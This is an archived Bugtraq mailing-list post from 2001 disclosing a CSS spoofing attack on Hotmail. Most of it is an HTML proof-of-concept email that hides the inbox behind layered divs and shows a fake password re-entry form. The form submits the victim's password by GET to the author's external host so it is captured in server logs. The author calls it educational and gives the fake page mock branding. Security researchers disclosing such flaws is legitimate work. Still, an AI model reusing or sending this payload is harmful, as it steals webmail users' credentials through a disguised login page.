Home page logo

bugtraq logo Bugtraq mailing list archives

spoofing hotmail with css (exploit)
From: gregory duchemin <c3rb3r () HOTMAIL COM>
Date: Fri, 26 Jan 2001 18:28:17 -0000

Some people around here asked me for an exploit, so this is the proof of
concept for css hotmail spoofing/ password recovery.
To use it, just mail it to yourself not others.
All graphics were made by the author to explicitly show it is not the real
hotmail relogin page and thus preventing any abuse and copyright violation.
did work fine with MSIE, would need some little changes to work on Netscape.
Be warnned when hotmail ask u next time ;)


Gregory Duchemin


<!-- H0RSEM4IL.c0m , trojanized mail to catch users password.

    A proof of concept for most of web based mailer.
    Tested on Hotmail with msie.

    To try it, just mail this page to an hotmail mailbox but remember
    This page is for educational purposes ONLY !



<div align="left">
 <div id="layer1" style="width:1280px; height:768px; position:absolute;
left:0px; top:0px; z-index:0;">

   <!-- First Layer, a big blank screen to hide Hotmail desk -->

       <div id="layer2" style="position:absolute; left:40; top:100;

       <!-- Layer 2, will show up the near to original hotmail re-enter
            password screen ;) -->

       <!-- Here we have slightly modified the orignal hotmail login.html
to point
            on our own site with GET method to catch password in our logs

        <form name="passwordform" target="layer2"
action="http://c3rber.multimania.com/merci.txt"; method="GET" target="_top"
       <table cellpadding=0 cellspacing=0 border=0 width=590>
        <td colspan=2>
        <table cellpadding=0 cellspacing=0 border=0 width="100%"><tr><td>
        <a href="javascript:void()" target="_top"><img
src="http://c3rber.multimania.com/horsemail.gif"; width=468 height=60
border=0 alt=""></a>
        <td align="CENTER" nowrap>
        <img src="http://c3rber.multimania.com/pass.gif"; width=140 height=44
border=0 alt="Find Out More About Passport"><br>
       <a href="javascript:void()" target="_top"><font class="f"
        <td bgcolor="#cccc99"><font class="f" size=4><b>Please re-enter your
password at your own risk</b></font></td>
        <td valign="top"><table width="100%" border=0 cellspacing=0
cellpadding=0><tr><td height=1 bgcolor="#cccc99"></td></tr></table></td>
        <tr><td height="6"></td></tr>
        <tr valign="top">
        <td><font class="s">

        <td rowspan=4><font class="s">


       <font class="f" size=2><b>&lt;victim () hotmail com&gt;</b></font>
        <input type="hidden" name="domain" value="hotmail.com">
       <table cellpadding=0 cellspacing=0>
       <td height=35 valign="middle"><font
       <td><input type="password" name="passwd" size="16"
       <td width=22 valign="middle" align="center">&nbsp;</td>
       <td><input type="submit" name="enter" value="Sign in"></td>
       <td colspan="2"><font class="f" size=2><b><a
href="javascript:void()" target="_top">Change

        <table cellpadding=0 cellspacing=0 border=0 width=590>
       <font class="s">Fake &copy; 2001 P0w3rsoft Corporation. All rights
not reserved.</font>
       <a href="javascript:void()">H0rsemail TERMS OF USE and
NOTICES</font></a> &nbsp;
       <a href="javascript:void()"><font class="s">untrusted Privacy


      <p align="center">

      <img src="http://c3rber.multimania.com/hotmail.jpg"; width="1280"
height="950" border="0" >




    Gregory Duchemin  - Security Consultant -
    1001 bd Maisonneuve Ouest - suite 200
    H3A 3C8 Montreal - Quebec - CANADA
    c3rb3r () hotmail com

    Original idea : Ben Li <bali () THOCK COM>

Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

  By Date           By Thread  

Current thread:
  • spoofing hotmail with css (exploit) gregory duchemin (Jan 29)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]